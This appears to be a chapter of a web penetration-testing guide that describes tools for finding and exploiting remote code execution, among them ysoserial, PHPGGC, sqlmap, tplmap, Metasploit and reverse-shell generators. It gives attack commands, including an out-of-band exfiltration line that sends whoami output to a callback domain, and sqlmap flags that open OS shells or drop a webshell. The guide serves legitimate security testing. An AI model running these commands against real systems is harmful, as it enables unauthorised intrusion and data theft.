Checklist

  • Have an OOB client running before blind testing.
  • Keep gadget generators (ysoserial, PHPGGC, ysoserial.net) ready offline.
  • Know the one command that confirms each class quickly.
  • Verify tool output by hand before you report it.

Burp Suite

  • Purpose: intercept, modify, and replay HTTP. The hub for manual web testing.
  • Install: download from PortSwigger. Community edition works; Pro adds Intruder speed, Collaborator, and scanning.
  • Basic usage: proxy the browser, send requests to Repeater, edit and resend. Use Intruder to fuzz an injection point with a payload list.
  • Advanced usage: Collaborator for OOB, the Turbo Intruder extension for high speed and smuggling, and match and replace rules to tag requests.
  • Pitfalls: Community Intruder is throttled. Scope your target so you do not proxy noise.

interactsh

  • Purpose: out of band detection for DNS and HTTP callbacks.
  • Install: go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest.
  • Basic usage: run interactsh-client, take the printed domain, put it in payloads, watch the log.
  • Advanced usage: exfiltrate blind output through subdomains, for example nslookup $(whoami).ID.oast.fun. Nuclei uses it automatically.
  • Pitfalls: some targets block egress. A missing callback is not always a missing bug; try timing too.

tplmap

  • Purpose: detect and exploit server side template injection.
  • Install: clone the repo and run with Python.
  • Basic usage: tplmap -u 'https://target/page?name=*' marks the injection point with *.
  • Advanced usage: --os-shell for an interactive shell when the engine allows it, and engine specific flags.
  • Pitfalls: it is a confirmation aid, not a replacement for understanding the engine. Verify by hand.

ysoserial

  • Purpose: generate Java deserialization gadget payloads.
  • Install: download the jar.
  • Basic usage: java -jar ysoserial.jar CommonsCollections1 'id' > payload.bin, then send where the object is read.
  • Advanced usage: pick the chain that matches the classpath, and use URLDNS to prove the sink reads your object without running a command.
  • Pitfalls: the chain must match the libraries present. Read the deserialization error to choose.

ysoserial.net

  • Purpose: gadget payloads for .NET formatters.
  • Install: download the release binary.
  • Basic usage: ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "cmd /c calc".
  • Advanced usage: generate ViewState payloads when you have the machine key, and target the specific formatter the app uses.
  • Pitfalls: the formatter and gadget must match the target. ViewState needs the key or an unprotected config.

PHPGGC

  • Purpose: generate PHP deserialization POP chains for known frameworks.
  • Install: clone the repo.
  • Basic usage: ./phpggc Laravel/RCE5 system id prints a payload.
  • Advanced usage: list chains with -l, and combine with phar for file operation triggers.
  • Pitfalls: the framework and version must match. When nothing fits, build the POP chain by hand.

Commix

  • Purpose: automate command injection detection and exploitation.
  • Install: clone the repo.
  • Basic usage: commix -u 'https://target/ping?host=127.0.0.1'.
  • Advanced usage: specify the injectable parameter, technique, and get a pseudo shell.
  • Pitfalls: noisy. Confirm the finding manually and keep a clean PoC.

Nuclei

  • Purpose: template based scanning for known RCEs and misconfigurations.
  • Install: go install github.com/projectdiscovery/nuclei/cmd/nuclei@latest, then nuclei -update-templates.
  • Basic usage: nuclei -u https://target -tags rce,injection,ssti,log4j.
  • Advanced usage: pipe a target list, enable OOB, and write custom templates for a bug you found.
  • Pitfalls: matches are leads. Validate each before reporting.

Searchsploit

  • Purpose: offline search of Exploit-DB.
  • Install: part of exploitdb, apt install exploitdb.
  • Basic usage: searchsploit product version.
  • Advanced usage: -m to copy an exploit locally, -x to read it.
  • Pitfalls: public exploits often need edits. Read before you run.

sqlmap

  • Purpose: automate SQL injection, including routes to RCE.
  • Install: clone the repo or apt install sqlmap.
  • Basic usage: sqlmap -u 'https://target/item?id=1' --batch.
  • Advanced usage: --os-shell for MySQL INTO OUTFILE or MSSQL xp_cmdshell paths, --file-write to drop a webshell.
  • Pitfalls: --os-shell needs the right privileges and a known writable path. Know the DBMS first.

Metasploit

  • Purpose: exploit modules, payloads, and session handling.
  • Install: the Metasploit Framework package.
  • Basic usage: use exploit/..., set options, run. Use multi/handler to catch shells.
  • Advanced usage: msfvenom to build payloads, and session routing to pivot.
  • Pitfalls: heavy and noisy. For a single clean PoC, a one liner is often better.

revshells.com

  • Purpose: generate reverse shell one liners for many languages from a host and port.
  • Usage: set your IP and port, pick the language and shell type, copy the payload. Includes listener commands and TTY upgrade snippets.
  • Pitfalls: it is a generator, not a guarantee. The target still needs the binary and egress.

Takeaway

Pick the smallest tool that proves the bug, confirm by hand, and keep the clean request for the report. Continue to Bypasses.